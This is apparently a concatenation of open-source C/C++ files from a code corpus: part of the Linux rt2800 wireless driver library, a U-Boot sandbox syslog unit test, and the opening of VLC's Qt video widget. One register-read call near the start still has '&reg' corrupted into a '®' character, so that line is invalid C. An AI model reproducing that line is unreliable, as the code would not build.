*/
spec->supported_rates = SUPPORT_RATE_CCK | SUPPORT_RATE_OFDM;
switch (rt2x00dev->chip.rf) {
case RF2720:
case RF2820:
spec->num_channels = 14;
spec->channels = rf_vals;
break;
case RF2750:
case RF2850:
spec->num_channels = ARRAY_SIZE(rf_vals);
spec->channels = rf_vals;
break;
case RF2020:
case RF3020:
case RF3021:
case RF3022:
case RF3070:
case RF3290:
case RF3320:
case RF3322:
case RF5360:
case RF5362:
case RF5370:
case RF5372:
case RF5390:
case RF5392:
spec->num_channels = 14;
spec->channels = rf_vals_3x;
break;
case RF3052:
case RF3053:
spec->num_channels = ARRAY_SIZE(rf_vals_3x);
spec->channels = rf_vals_3x;
break;
case RF5592:
rt2800_register_read(rt2x00dev, MAC_DEBUG_INDEX, ®);
if (rt2x00_get_field32(reg, MAC_DEBUG_INDEX_XTAL)) {
spec->num_channels = ARRAY_SIZE(rf_vals_5592_xtal40);
spec->channels = rf_vals_5592_xtal40;
} else {
spec->num_channels = ARRAY_SIZE(rf_vals_5592_xtal20);
spec->channels = rf_vals_5592_xtal20;
}
break;
}
if (WARN_ON_ONCE(!spec->channels))
return -ENODEV;
spec->supported_bands = SUPPORT_BAND_2GHZ;
if (spec->num_channels > 14)
spec->supported_bands |= SUPPORT_BAND_5GHZ;
/*
* Initialize HT information.
*/
if (!rt2x00_rf(rt2x00dev, RF2020))
spec->ht.ht_supported = true;
else
spec->ht.ht_supported = false;
spec->ht.cap =
IEEE80211_HT_CAP_SUP_WIDTH_20_40 |
IEEE80211_HT_CAP_GRN_FLD |
IEEE80211_HT_CAP_SGI_20 |
IEEE80211_HT_CAP_SGI_40;
if (rt2x00dev->default_ant.tx_chain_num >= 2)
spec->ht.cap |= IEEE80211_HT_CAP_TX_STBC;
spec->ht.cap |= rt2x00dev->default_ant.rx_chain_num <<
IEEE80211_HT_CAP_RX_STBC_SHIFT;
spec->ht.ampdu_factor = 3;
spec->ht.ampdu_density = 4;
spec->ht.mcs.tx_params =
IEEE80211_HT_MCS_TX_DEFINED |
IEEE80211_HT_MCS_TX_RX_DIFF |
((rt2x00dev->default_ant.tx_chain_num - 1) <<
IEEE80211_HT_MCS_TX_MAX_STREAMS_SHIFT);
switch (rt2x00dev->default_ant.rx_chain_num) {
case 3:
spec->ht.mcs.rx_mask[2] = 0xff;
case 2:
spec->ht.mcs.rx_mask[1] = 0xff;
case 1:
spec->ht.mcs.rx_mask[0] = 0xff;
spec->ht.mcs.rx_mask[4] = 0x1; /* MCS32 */
break;
}
/*
* Create channel information array
*/
info = kcalloc(spec->num_channels, sizeof(*info), GFP_KERNEL);
if (!info)
return -ENOMEM;
spec->channels_info = info;
default_power1 = rt2800_eeprom_addr(rt2x00dev, EEPROM_TXPOWER_BG1);
default_power2 = rt2800_eeprom_addr(rt2x00dev, EEPROM_TXPOWER_BG2);
if (rt2x00dev->default_ant.tx_chain_num > 2)
default_power3 = rt2800_eeprom_addr(rt2x00dev,
EEPROM_EXT_TXPOWER_BG3);
else
default_power3 = NULL;
for (i = 0; i < 14; i++) {
info[i].default_power1 = default_power1[i];
info[i].default_power2 = default_power2[i];
if (default_power3)
info[i].default_power3 = default_power3[i];
}
if (spec->num_channels > 14) {
default_power1 = rt2800_eeprom_addr(rt2x00dev,
EEPROM_TXPOWER_A1);
default_power2 = rt2800_eeprom_addr(rt2x00dev,
EEPROM_TXPOWER_A2);
if (rt2x00dev->default_ant.tx_chain_num > 2)
default_power3 =
rt2800_eeprom_addr(rt2x00dev,
EEPROM_EXT_TXPOWER_A3);
else
default_power3 = NULL;
for (i = 14; i < spec->num_channels; i++) {
info[i].default_power1 = default_power1[i - 14];
info[i].default_power2 = default_power2[i - 14];
if (default_power3)
info[i].default_power3 = default_power3[i - 14];
}
}
switch (rt2x00dev->chip.rf) {
case RF2020:
case RF3020:
case RF3021:
case RF3022:
case RF3320:
case RF3052:
case RF3053:
case RF3070:
case RF3290:
case RF5360:
case RF5362:
case RF5370:
case RF5372:
case RF5390:
case RF5392:
__set_bit(CAPABILITY_VCO_RECALIBRATION, &rt2x00dev->cap_flags);
break;
}
return 0;
}
/*
 * rt2800_probe_rt - read and validate the RT chipset identification
 * @rt2x00dev: device being probed
 *
 * Reads MAC_CSR0 (or MAC_CSR0_3290 on the RT3290), extracts chipset and
 * revision, and records them with rt2x00_set_rt().
 *
 * Return: 0 on success, -ENODEV when the chipset is not supported.
 *
 * Fix: restored "&reg" in the register-read calls, which had been
 * mojibake-decoded into a registered-trademark character.
 */
static int rt2800_probe_rt(struct rt2x00_dev *rt2x00dev)
{
	u32 reg;
	u32 rt;
	u32 rev;

	/* The RT3290 exposes its identification at a different offset. */
	if (rt2x00_rt(rt2x00dev, RT3290))
		rt2800_register_read(rt2x00dev, MAC_CSR0_3290, &reg);
	else
		rt2800_register_read(rt2x00dev, MAC_CSR0, &reg);

	rt = rt2x00_get_field32(reg, MAC_CSR0_CHIPSET);
	rev = rt2x00_get_field32(reg, MAC_CSR0_REVISION);

	switch (rt) {
	case RT2860:
	case RT2872:
	case RT2883:
	case RT3070:
	case RT3071:
	case RT3090:
	case RT3290:
	case RT3352:
	case RT3390:
	case RT3572:
	case RT3593:
	case RT5390:
	case RT5392:
	case RT5592:
		break;
	default:
		rt2x00_err(rt2x00dev, "Invalid RT chipset 0x%04x, rev %04x detected\n",
			   rt, rev);
		return -ENODEV;
	}

	rt2x00_set_rt(rt2x00dev, rt, rev);

	return 0;
}
/*
 * rt2800_probe_hw - top-level probe for RT2800 based devices
 * @rt2x00dev: device being probed
 *
 * Identifies the RT chipset, validates and parses the EEPROM, prepares
 * rfkill GPIO polling, probes the hw mode specification, and finally
 * records the device capability/requirement flags.
 *
 * Return: 0 on success, a negative errno from any probe step otherwise.
 *
 * Fix: restored "&reg" in the GPIO_CTRL read/modify sequence, which had
 * been mojibake-decoded into a registered-trademark character.
 */
int rt2800_probe_hw(struct rt2x00_dev *rt2x00dev)
{
	int retval;
	u32 reg;

	retval = rt2800_probe_rt(rt2x00dev);
	if (retval)
		return retval;

	/*
	 * Allocate eeprom data.
	 */
	retval = rt2800_validate_eeprom(rt2x00dev);
	if (retval)
		return retval;

	retval = rt2800_init_eeprom(rt2x00dev);
	if (retval)
		return retval;

	/*
	 * Enable rfkill polling by setting GPIO direction of the
	 * rfkill switch GPIO pin correctly.
	 */
	rt2800_register_read(rt2x00dev, GPIO_CTRL, &reg);
	rt2x00_set_field32(&reg, GPIO_CTRL_DIR2, 1);
	rt2800_register_write(rt2x00dev, GPIO_CTRL, reg);

	/*
	 * Initialize hw specifications.
	 */
	retval = rt2800_probe_hw_mode(rt2x00dev);
	if (retval)
		return retval;

	/*
	 * Set device capabilities.
	 */
	__set_bit(CAPABILITY_CONTROL_FILTERS, &rt2x00dev->cap_flags);
	__set_bit(CAPABILITY_CONTROL_FILTER_PSPOLL, &rt2x00dev->cap_flags);
	if (!rt2x00_is_usb(rt2x00dev))
		__set_bit(CAPABILITY_PRE_TBTT_INTERRUPT, &rt2x00dev->cap_flags);

	/*
	 * Set device requirements.
	 */
	if (!rt2x00_is_soc(rt2x00dev))
		__set_bit(REQUIRE_FIRMWARE, &rt2x00dev->cap_flags);
	__set_bit(REQUIRE_L2PAD, &rt2x00dev->cap_flags);
	__set_bit(REQUIRE_TXSTATUS_FIFO, &rt2x00dev->cap_flags);
	if (!rt2800_hwcrypt_disabled(rt2x00dev))
		__set_bit(CAPABILITY_HW_CRYPTO, &rt2x00dev->cap_flags);
	__set_bit(CAPABILITY_LINK_TUNING, &rt2x00dev->cap_flags);
	__set_bit(REQUIRE_HT_TX_DESC, &rt2x00dev->cap_flags);
	if (rt2x00_is_usb(rt2x00dev))
		__set_bit(REQUIRE_PS_AUTOWAKE, &rt2x00dev->cap_flags);
	else {
		__set_bit(REQUIRE_DMA, &rt2x00dev->cap_flags);
		__set_bit(REQUIRE_TASKLET_CONTEXT, &rt2x00dev->cap_flags);
	}

	/*
	 * Set the rssi offset.
	 */
	rt2x00dev->rssi_offset = DEFAULT_RSSI_OFFSET;

	return 0;
}
EXPORT_SYMBOL_GPL(rt2800_probe_hw);
/*
* IEEE80211 stack callback functions.
*/
void rt2800_get_key_seq(struct ieee80211_hw *hw,
struct ieee80211_key_conf *key,
struct ieee80211_key_seq *seq)
{
struct rt2x00_dev *rt2x00dev = hw->priv;
struct mac_iveiv_entry iveiv_entry;
u32 offset;
if (key->cipher != WLAN_CIPHER_SUITE_TKIP)
return;
offset = MAC_IVEIV_ENTRY(key->hw_key_idx);
rt2800_register_multiread(rt2x00dev, offset,
&iveiv_entry, sizeof(iveiv_entry));
memcpy(&seq->tkip.iv16, &iveiv_entry.iv[0], 2);
memcpy(&seq->tkip.iv32, &iveiv_entry.iv[4], 4);
}
EXPORT_SYMBOL_GPL(rt2800_get_key_seq);
/*
 * rt2800_set_rts_threshold - mac80211 set_rts_threshold callback
 * @hw: ieee80211 hardware
 * @value: new RTS threshold
 *
 * Programs the threshold into TX_RTS_CFG and toggles RTS protection in
 * every protection configuration register (CCK, OFDM, MM20/40, GF20/40).
 * Protection is disabled when the threshold reaches
 * IEEE80211_MAX_RTS_THRESHOLD.
 *
 * Fix: restored "&reg" in every read/modify call, which had been
 * mojibake-decoded into a registered-trademark character.
 */
int rt2800_set_rts_threshold(struct ieee80211_hw *hw, u32 value)
{
	struct rt2x00_dev *rt2x00dev = hw->priv;
	u32 reg;
	bool enabled = (value < IEEE80211_MAX_RTS_THRESHOLD);

	rt2800_register_read(rt2x00dev, TX_RTS_CFG, &reg);
	rt2x00_set_field32(&reg, TX_RTS_CFG_RTS_THRES, value);
	rt2800_register_write(rt2x00dev, TX_RTS_CFG, reg);

	rt2800_register_read(rt2x00dev, CCK_PROT_CFG, &reg);
	rt2x00_set_field32(&reg, CCK_PROT_CFG_RTS_TH_EN, enabled);
	rt2800_register_write(rt2x00dev, CCK_PROT_CFG, reg);

	rt2800_register_read(rt2x00dev, OFDM_PROT_CFG, &reg);
	rt2x00_set_field32(&reg, OFDM_PROT_CFG_RTS_TH_EN, enabled);
	rt2800_register_write(rt2x00dev, OFDM_PROT_CFG, reg);

	rt2800_register_read(rt2x00dev, MM20_PROT_CFG, &reg);
	rt2x00_set_field32(&reg, MM20_PROT_CFG_RTS_TH_EN, enabled);
	rt2800_register_write(rt2x00dev, MM20_PROT_CFG, reg);

	rt2800_register_read(rt2x00dev, MM40_PROT_CFG, &reg);
	rt2x00_set_field32(&reg, MM40_PROT_CFG_RTS_TH_EN, enabled);
	rt2800_register_write(rt2x00dev, MM40_PROT_CFG, reg);

	rt2800_register_read(rt2x00dev, GF20_PROT_CFG, &reg);
	rt2x00_set_field32(&reg, GF20_PROT_CFG_RTS_TH_EN, enabled);
	rt2800_register_write(rt2x00dev, GF20_PROT_CFG, reg);

	rt2800_register_read(rt2x00dev, GF40_PROT_CFG, &reg);
	rt2x00_set_field32(&reg, GF40_PROT_CFG_RTS_TH_EN, enabled);
	rt2800_register_write(rt2x00dev, GF40_PROT_CFG, reg);

	return 0;
}
EXPORT_SYMBOL_GPL(rt2800_set_rts_threshold);
/*
 * rt2800_conf_tx - mac80211 conf_tx callback
 * @hw: ieee80211 hardware
 * @vif: interface the configuration applies to
 * @queue_idx: tx queue index
 * @params: new queue parameters
 *
 * Validates the parameters through rt2x00lib, then programs the WMM
 * (TXOP/AIFSN/CWMIN/CWMAX) and EDCA registers for the queue.
 *
 * Return: 0 on success or the error returned by rt2x00mac_conf_tx().
 *
 * Fixes: restored "&reg" in the register-access calls (mojibake-decoded
 * into a registered-trademark character) and a comment typo
 * ("queues/" -> "queues.").
 */
int rt2800_conf_tx(struct ieee80211_hw *hw,
		   struct ieee80211_vif *vif, u16 queue_idx,
		   const struct ieee80211_tx_queue_params *params)
{
	struct rt2x00_dev *rt2x00dev = hw->priv;
	struct data_queue *queue;
	struct rt2x00_field32 field;
	int retval;
	u32 reg;
	u32 offset;

	/*
	 * First pass the configuration through rt2x00lib, that will
	 * update the queue settings and validate the input. After that
	 * we are free to update the registers based on the value
	 * in the queue parameter.
	 */
	retval = rt2x00mac_conf_tx(hw, vif, queue_idx, params);
	if (retval)
		return retval;

	/*
	 * We only need to perform additional register initialization
	 * for WMM queues.
	 */
	if (queue_idx >= 4)
		return 0;

	queue = rt2x00queue_get_tx_queue(rt2x00dev, queue_idx);

	/* Update WMM TXOP register: two queues share each 32 bit word. */
	offset = WMM_TXOP0_CFG + (sizeof(u32) * (!!(queue_idx & 2)));
	field.bit_offset = (queue_idx & 1) * 16;
	field.bit_mask = 0xffff << field.bit_offset;

	rt2800_register_read(rt2x00dev, offset, &reg);
	rt2x00_set_field32(&reg, field, queue->txop);
	rt2800_register_write(rt2x00dev, offset, reg);

	/* Update WMM registers: four bits per queue in each register. */
	field.bit_offset = queue_idx * 4;
	field.bit_mask = 0xf << field.bit_offset;

	rt2800_register_read(rt2x00dev, WMM_AIFSN_CFG, &reg);
	rt2x00_set_field32(&reg, field, queue->aifs);
	rt2800_register_write(rt2x00dev, WMM_AIFSN_CFG, reg);

	rt2800_register_read(rt2x00dev, WMM_CWMIN_CFG, &reg);
	rt2x00_set_field32(&reg, field, queue->cw_min);
	rt2800_register_write(rt2x00dev, WMM_CWMIN_CFG, reg);

	rt2800_register_read(rt2x00dev, WMM_CWMAX_CFG, &reg);
	rt2x00_set_field32(&reg, field, queue->cw_max);
	rt2800_register_write(rt2x00dev, WMM_CWMAX_CFG, reg);

	/* Update EDCA registers: one 32 bit word per queue. */
	offset = EDCA_AC0_CFG + (sizeof(u32) * queue_idx);

	rt2800_register_read(rt2x00dev, offset, &reg);
	rt2x00_set_field32(&reg, EDCA_AC0_CFG_TX_OP, queue->txop);
	rt2x00_set_field32(&reg, EDCA_AC0_CFG_AIFSN, queue->aifs);
	rt2x00_set_field32(&reg, EDCA_AC0_CFG_CWMIN, queue->cw_min);
	rt2x00_set_field32(&reg, EDCA_AC0_CFG_CWMAX, queue->cw_max);
	rt2800_register_write(rt2x00dev, offset, reg);

	return 0;
}
EXPORT_SYMBOL_GPL(rt2800_conf_tx);
/*
 * rt2800_get_tsf - mac80211 get_tsf callback
 * @hw: ieee80211 hardware
 * @vif: interface (unused by the hardware read)
 *
 * Assembles the 64 bit TSF timer from the two 32 bit hardware words.
 * NOTE(review): the high word is read before the low word, so a low-word
 * wrap between the two reads could yield an inconsistent value - confirm
 * whether this matters for callers.
 *
 * Fix: restored "&reg" in the register-read calls, which had been
 * mojibake-decoded into a registered-trademark character.
 */
u64 rt2800_get_tsf(struct ieee80211_hw *hw, struct ieee80211_vif *vif)
{
	struct rt2x00_dev *rt2x00dev = hw->priv;
	u64 tsf;
	u32 reg;

	rt2800_register_read(rt2x00dev, TSF_TIMER_DW1, &reg);
	tsf = (u64) rt2x00_get_field32(reg, TSF_TIMER_DW1_HIGH_WORD) << 32;
	rt2800_register_read(rt2x00dev, TSF_TIMER_DW0, &reg);
	tsf |= rt2x00_get_field32(reg, TSF_TIMER_DW0_LOW_WORD);

	return tsf;
}
EXPORT_SYMBOL_GPL(rt2800_get_tsf);
/*
 * rt2800_ampdu_action - mac80211 ampdu_action callback
 * @hw: ieee80211 hardware
 * @vif: interface the session belongs to
 * @action: requested AMPDU state transition
 * @sta: peer station
 * @tid: traffic identifier
 * @ssn: starting sequence number (unused here)
 * @buf_size: reorder buffer size (unused here)
 *
 * Return: 0 on success, 1 when aggregation is refused for the station.
 */
int rt2800_ampdu_action(struct ieee80211_hw *hw, struct ieee80211_vif *vif,
			enum ieee80211_ampdu_mlme_action action,
			struct ieee80211_sta *sta, u16 tid, u16 *ssn,
			u8 buf_size)
{
	struct rt2x00_sta *sta_priv = (struct rt2x00_sta *)sta->drv_priv;

	/*
	 * Refuse aggregation for stations the hardware does not know about:
	 * their tx status reports all carry wcid=WCID_END+1, so frames of
	 * several such stations cannot be told apart once the hardware
	 * reorders them for aggregation.
	 */
	if (sta_priv->wcid > WCID_END)
		return 1;

	switch (action) {
	case IEEE80211_AMPDU_RX_START:
	case IEEE80211_AMPDU_RX_STOP:
		/*
		 * Incoming BlockAck handling is done fully in hardware;
		 * mac80211 only has to negotiate the agreement, after which
		 * AMPDUs are acknowledged without further setup.
		 */
		break;
	case IEEE80211_AMPDU_TX_START:
		ieee80211_start_tx_ba_cb_irqsafe(vif, sta->addr, tid);
		break;
	case IEEE80211_AMPDU_TX_STOP_CONT:
	case IEEE80211_AMPDU_TX_STOP_FLUSH:
	case IEEE80211_AMPDU_TX_STOP_FLUSH_CONT:
		ieee80211_stop_tx_ba_cb_irqsafe(vif, sta->addr, tid);
		break;
	case IEEE80211_AMPDU_TX_OPERATIONAL:
		break;
	default:
		rt2x00_warn((struct rt2x00_dev *)hw->priv,
			    "Unknown AMPDU action\n");
	}

	return 0;
}
EXPORT_SYMBOL_GPL(rt2800_ampdu_action);
/*
 * rt2800_get_survey - mac80211 get_survey callback
 * @hw: ieee80211 hardware
 * @idx: survey index; only 0 (the current channel) is supported
 * @survey: output survey data
 *
 * Reports channel idle/busy statistics from the CH_*_STA counters.
 * Return: 0 on success, -ENOENT for any index other than 0.
 */
int rt2800_get_survey(struct ieee80211_hw *hw, int idx,
		      struct survey_info *survey)
{
	struct rt2x00_dev *rt2x00dev = hw->priv;
	struct ieee80211_conf *conf = &hw->conf;
	u32 idle, busy, busy_ext;

	if (idx != 0)
		return -ENOENT;

	survey->channel = conf->chandef.chan;

	rt2800_register_read(rt2x00dev, CH_IDLE_STA, &idle);
	rt2800_register_read(rt2x00dev, CH_BUSY_STA, &busy);
	rt2800_register_read(rt2x00dev, CH_BUSY_STA_SEC, &busy_ext);

	if (idle || busy) {
		survey->filled = SURVEY_INFO_TIME |
				 SURVEY_INFO_TIME_BUSY |
				 SURVEY_INFO_TIME_EXT_BUSY;

		/* Counters are in microseconds; report milliseconds. */
		survey->time = (idle + busy) / 1000;
		survey->time_busy = busy / 1000;
		survey->time_ext_busy = busy_ext / 1000;
	}

	/*
	 * NOTE(review): survey->filled is only assigned inside the branch
	 * above; the |= below presumably relies on the caller zeroing the
	 * structure beforehand - confirm against mac80211.
	 */
	if (!(hw->conf.flags & IEEE80211_CONF_OFFCHANNEL))
		survey->filled |= SURVEY_INFO_IN_USE;

	return 0;
}
EXPORT_SYMBOL_GPL(rt2800_get_survey);
/* Kernel module metadata. */
MODULE_AUTHOR(DRV_PROJECT ", Bartlomiej Zolnierkiewicz");
MODULE_VERSION(DRV_VERSION);
MODULE_DESCRIPTION("Ralink RT2800 library");
MODULE_LICENSE("GPL");
| gpl-2.0 |
Stane1983/u-boot | test/log/syslog_test.c | 3 | 6774 | // SPDX-License-Identifier: GPL-2.0+
/*
* Copyright (c) 2020, Heinrich Schuchardt <xypron.glpk@gmx.de>
*
* Logging function tests for CONFIG_LOG_SYSLOG=y.
*
* Invoke the test with: ./u-boot -d arch/sandbox/dts/test.dtb
*/
/* Override CONFIG_LOG_MAX_LEVEL */
#define LOG_DEBUG
#include <common.h>
#include <dm/device.h>
#include <hexdump.h>
#include <test/log.h>
#include <test/test.h>
#include <test/suites.h>
#include <test/ut.h>
#include <asm/eth.h>
#include "syslog_test.h"
DECLARE_GLOBAL_DATA_PTR;
/*
 * sb_log_tx_handler() - validate a syslog datagram sent by the log driver
 * @dev: sandbox Ethernet device that "transmitted" the packet
 * @packet: raw Ethernet frame
 * @len: frame length
 *
 * Checks that the frame is a broadcast IPv4/UDP packet to port 514 whose
 * payload matches env->expected, then clears env->expected so the test
 * can verify the handler ran.
 *
 * Fix: restored "&eth_hdr" in the destination-address assertion, which
 * had been mojibake-decoded into an eth (U+00F0) character.
 *
 * Return: 0
 */
int sb_log_tx_handler(struct udevice *dev, void *packet, unsigned int len)
{
	struct eth_sandbox_priv *priv = dev_get_priv(dev);
	struct sb_log_env *env = priv->priv;
	/* uts is updated by the ut_assert* macros */
	struct unit_test_state *uts = env->uts;
	char *buf = packet;
	struct ethernet_hdr *eth_hdr = packet;
	struct ip_udp_hdr *ip_udp_hdr;

	/* Check Ethernet header */
	ut_asserteq_mem(&eth_hdr->et_dest, net_bcast_ethaddr, ARP_HLEN);
	ut_asserteq(ntohs(eth_hdr->et_protlen), PROT_IP);

	/* Check IP header */
	buf += sizeof(struct ethernet_hdr);
	ip_udp_hdr = (struct ip_udp_hdr *)buf;
	ut_asserteq(ip_udp_hdr->ip_p, IPPROTO_UDP);
	ut_asserteq(ip_udp_hdr->ip_dst.s_addr, 0xffffffff);
	ut_asserteq(ntohs(ip_udp_hdr->udp_dst), 514);
	ut_asserteq(UDP_HDR_SIZE + strlen(env->expected) + 1,
		    ntohs(ip_udp_hdr->udp_len));

	/* Check payload */
	buf += sizeof(struct ip_udp_hdr);
	ut_asserteq_mem(env->expected, buf,
			ntohs(ip_udp_hdr->udp_len) - UDP_HDR_SIZE);

	/* Signal that the callback function has been executed */
	env->expected = NULL;

	return 0;
}
/* Enable the syslog log driver before a test runs. Return: 0 = success */
int syslog_test_setup(struct unit_test_state *uts)
{
	ut_assertok(log_device_set_enable(LOG_GET_DRIVER(syslog), true));

	return 0;
}
/* Disable the syslog log driver after a test has run. Return: 0 = success */
int syslog_test_finish(struct unit_test_state *uts)
{
	ut_assertok(log_device_set_enable(LOG_GET_DRIVER(syslog), false));

	return 0;
}
/**
 * log_test_syslog_err() - test log_err() function
 *
 * The message should be broadcast as a syslog datagram with severity 3
 * (err); sb_log_tx_handler() validates the packet and clears
 * env.expected on success.
 *
 * Fix: unlike the sibling tests, this test never asserted that the tx
 * handler actually ran - the comment claimed a check that was missing.
 * ut_assertnull(env.expected) has been added to match the other tests.
 *
 * @uts: unit test state
 * Return: 0 = success
 */
static int log_test_syslog_err(struct unit_test_state *uts)
{
	int old_log_level = gd->default_log_level;
	struct sb_log_env env;

	ut_assertok(syslog_test_setup(uts));
	gd->log_fmt = LOGF_TEST;
	gd->default_log_level = LOGL_INFO;
	env_set("ethact", "eth@10002000");
	env_set("log_hostname", "sandbox");
	env.expected = "<3>sandbox uboot: log_test_syslog_err() "
		       "testing log_err\n";
	env.uts = uts;
	sandbox_eth_set_tx_handler(0, sb_log_tx_handler);
	/* Used by ut_assert macros in the tx_handler */
	sandbox_eth_set_priv(0, &env);
	log_err("testing %s\n", "log_err");
	sandbox_eth_set_tx_handler(0, NULL);
	/* Check that the callback function was called */
	ut_assertnull(env.expected);
	gd->default_log_level = old_log_level;
	gd->log_fmt = log_get_default_format();
	ut_assertok(syslog_test_finish(uts));

	return 0;
}
LOG_TEST(log_test_syslog_err);
/**
 * log_test_syslog_warning() - test log_warning() function
 *
 * The message should be broadcast as a syslog datagram with severity 4
 * (warning); sb_log_tx_handler() validates the packet and clears
 * env.expected on success.
 *
 * @uts: unit test state
 * Return: 0 = success
 */
static int log_test_syslog_warning(struct unit_test_state *uts)
{
	int old_log_level = gd->default_log_level;
	struct sb_log_env env;

	ut_assertok(syslog_test_setup(uts));
	gd->log_fmt = LOGF_TEST;
	gd->default_log_level = LOGL_INFO;
	env_set("ethact", "eth@10002000");
	env_set("log_hostname", "sandbox");
	env.expected = "<4>sandbox uboot: log_test_syslog_warning() "
		       "testing log_warning\n";
	env.uts = uts;
	sandbox_eth_set_tx_handler(0, sb_log_tx_handler);
	/* Used by ut_assert macros in the tx_handler */
	sandbox_eth_set_priv(0, &env);
	log_warning("testing %s\n", "log_warning");
	sandbox_eth_set_tx_handler(0, NULL);
	/* Check that the callback function was called */
	ut_assertnull(env.expected);
	gd->default_log_level = old_log_level;
	gd->log_fmt = log_get_default_format();
	ut_assertok(syslog_test_finish(uts));

	return 0;
}
LOG_TEST(log_test_syslog_warning);
/**
 * log_test_syslog_notice() - test log_notice() function
 *
 * The message should be broadcast as a syslog datagram with severity 5
 * (notice); sb_log_tx_handler() validates the packet and clears
 * env.expected on success.
 *
 * @uts: unit test state
 * Return: 0 = success
 */
static int log_test_syslog_notice(struct unit_test_state *uts)
{
	int old_log_level = gd->default_log_level;
	struct sb_log_env env;

	ut_assertok(syslog_test_setup(uts));
	gd->log_fmt = LOGF_TEST;
	gd->default_log_level = LOGL_INFO;
	env_set("ethact", "eth@10002000");
	env_set("log_hostname", "sandbox");
	env.expected = "<5>sandbox uboot: log_test_syslog_notice() "
		       "testing log_notice\n";
	env.uts = uts;
	sandbox_eth_set_tx_handler(0, sb_log_tx_handler);
	/* Used by ut_assert macros in the tx_handler */
	sandbox_eth_set_priv(0, &env);
	log_notice("testing %s\n", "log_notice");
	sandbox_eth_set_tx_handler(0, NULL);
	/* Check that the callback function was called */
	ut_assertnull(env.expected);
	gd->default_log_level = old_log_level;
	gd->log_fmt = log_get_default_format();
	ut_assertok(syslog_test_finish(uts));

	return 0;
}
LOG_TEST(log_test_syslog_notice);
/**
 * log_test_syslog_info() - test log_info() function
 *
 * The message should be broadcast as a syslog datagram with severity 6
 * (info); sb_log_tx_handler() validates the packet and clears
 * env.expected on success.
 *
 * @uts: unit test state
 * Return: 0 = success
 */
static int log_test_syslog_info(struct unit_test_state *uts)
{
	int old_log_level = gd->default_log_level;
	struct sb_log_env env;

	ut_assertok(syslog_test_setup(uts));
	gd->log_fmt = LOGF_TEST;
	gd->default_log_level = LOGL_INFO;
	env_set("ethact", "eth@10002000");
	env_set("log_hostname", "sandbox");
	env.expected = "<6>sandbox uboot: log_test_syslog_info() "
		       "testing log_info\n";
	env.uts = uts;
	sandbox_eth_set_tx_handler(0, sb_log_tx_handler);
	/* Used by ut_assert macros in the tx_handler */
	sandbox_eth_set_priv(0, &env);
	log_info("testing %s\n", "log_info");
	sandbox_eth_set_tx_handler(0, NULL);
	/* Check that the callback function was called */
	ut_assertnull(env.expected);
	gd->default_log_level = old_log_level;
	gd->log_fmt = log_get_default_format();
	ut_assertok(syslog_test_finish(uts));

	return 0;
}
LOG_TEST(log_test_syslog_info);
/**
 * log_test_syslog_debug() - test log_debug() function
 *
 * The message should be broadcast as a syslog datagram with severity 7
 * (debug); sb_log_tx_handler() validates the packet and clears
 * env.expected on success.  The log level is raised to LOGL_DEBUG so
 * the message is not filtered out.
 *
 * @uts: unit test state
 * Return: 0 = success
 */
static int log_test_syslog_debug(struct unit_test_state *uts)
{
	int old_log_level = gd->default_log_level;
	struct sb_log_env env;

	ut_assertok(syslog_test_setup(uts));
	gd->log_fmt = LOGF_TEST;
	gd->default_log_level = LOGL_DEBUG;
	env_set("ethact", "eth@10002000");
	env_set("log_hostname", "sandbox");
	env.expected = "<7>sandbox uboot: log_test_syslog_debug() "
		       "testing log_debug\n";
	env.uts = uts;
	sandbox_eth_set_tx_handler(0, sb_log_tx_handler);
	/* Used by ut_assert macros in the tx_handler */
	sandbox_eth_set_priv(0, &env);
	log_debug("testing %s\n", "log_debug");
	sandbox_eth_set_tx_handler(0, NULL);
	/* Check that the callback function was called */
	ut_assertnull(env.expected);
	gd->default_log_level = old_log_level;
	gd->log_fmt = log_get_default_format();
	ut_assertok(syslog_test_finish(uts));

	return 0;
}
LOG_TEST(log_test_syslog_debug);
| gpl-2.0 |
xinran505982/videolan_vlc | modules/gui/qt4/components/interface_widgets.cpp | 3 | 26111 | /*****************************************************************************
* interface_widgets.cpp : Custom widgets for the main interface
****************************************************************************
* Copyright (C) 2006-2010 the VideoLAN team
* $Id$
*
* Authors: Clément Stenac <zorglub@videolan.org>
* Jean-Baptiste Kempf <jb@videolan.org>
* Rafaël Carré <funman@videolanorg>
* Ilkka Ollakka <ileoo@videolan.org>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* ( at your option ) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston MA 02110-1301, USA.
*****************************************************************************/
#ifdef HAVE_CONFIG_H
# include "config.h"
#endif
#include "qt4.hpp"
#include "components/interface_widgets.hpp"
#include "dialogs_provider.hpp"
#include "util/customwidgets.hpp" // qtEventToVLCKey, QVLCStackedWidget
#include "menus.hpp" /* Popup menu on bgWidget */
#include <QLabel>
#include <QToolButton>
#include <QPalette>
#include <QEvent>
#include <QResizeEvent>
#include <QDate>
#include <QMenu>
#include <QWidgetAction>
#include <QDesktopWidget>
#include <QPainter>
#include <QTimer>
#include <QSlider>
#include <QBitmap>
#include <QUrl>
#ifdef QT5_HAS_X11
# define Q_WS_X11
#endif
#ifdef Q_WS_X11
# include <X11/Xlib.h>
# include <qx11info_x11.h>
#endif
#include <math.h>
#include <assert.h>
#include <vlc_vout.h>
#include <vlc_vout_window.h>
/**********************************************************************
* Video Widget. A simple frame on which video is drawn
* This class handles resize issues
**********************************************************************/
/**
 * Video widget constructor.
 * Only prepares the layout that will later host the "stable" video
 * surface; no video window exists until request() is called.
 */
VideoWidget::VideoWidget( intf_thread_t *_p_i )
    : QFrame( NULL ) , p_intf( _p_i )
{
    /* Set the policy to expand in both directions */
    // setSizePolicy( QSizePolicy::Expanding, QSizePolicy::Expanding );

    layout = new QHBoxLayout( this );
    layout->setContentsMargins( 0, 0, 0, 0 );
    stable = NULL;
    p_window = NULL;
    show();
}
/** Destructor: release() must have been called before destruction. */
VideoWidget::~VideoWidget()
{
    /* Ensure we are not leaking the video output. This would crash. */
    assert( !stable );
    assert( !p_window );
}
/** Flush pending X11 requests; a no-op on other platforms. */
void VideoWidget::sync( void )
{
#ifdef Q_WS_X11
    /* Make sure the X server has processed all requests.
     * This protects other threads using distinct connections from getting
     * the video widget window in an inconsistent states. */
    XSync( QX11Info::display(), False );
#endif
}
/**
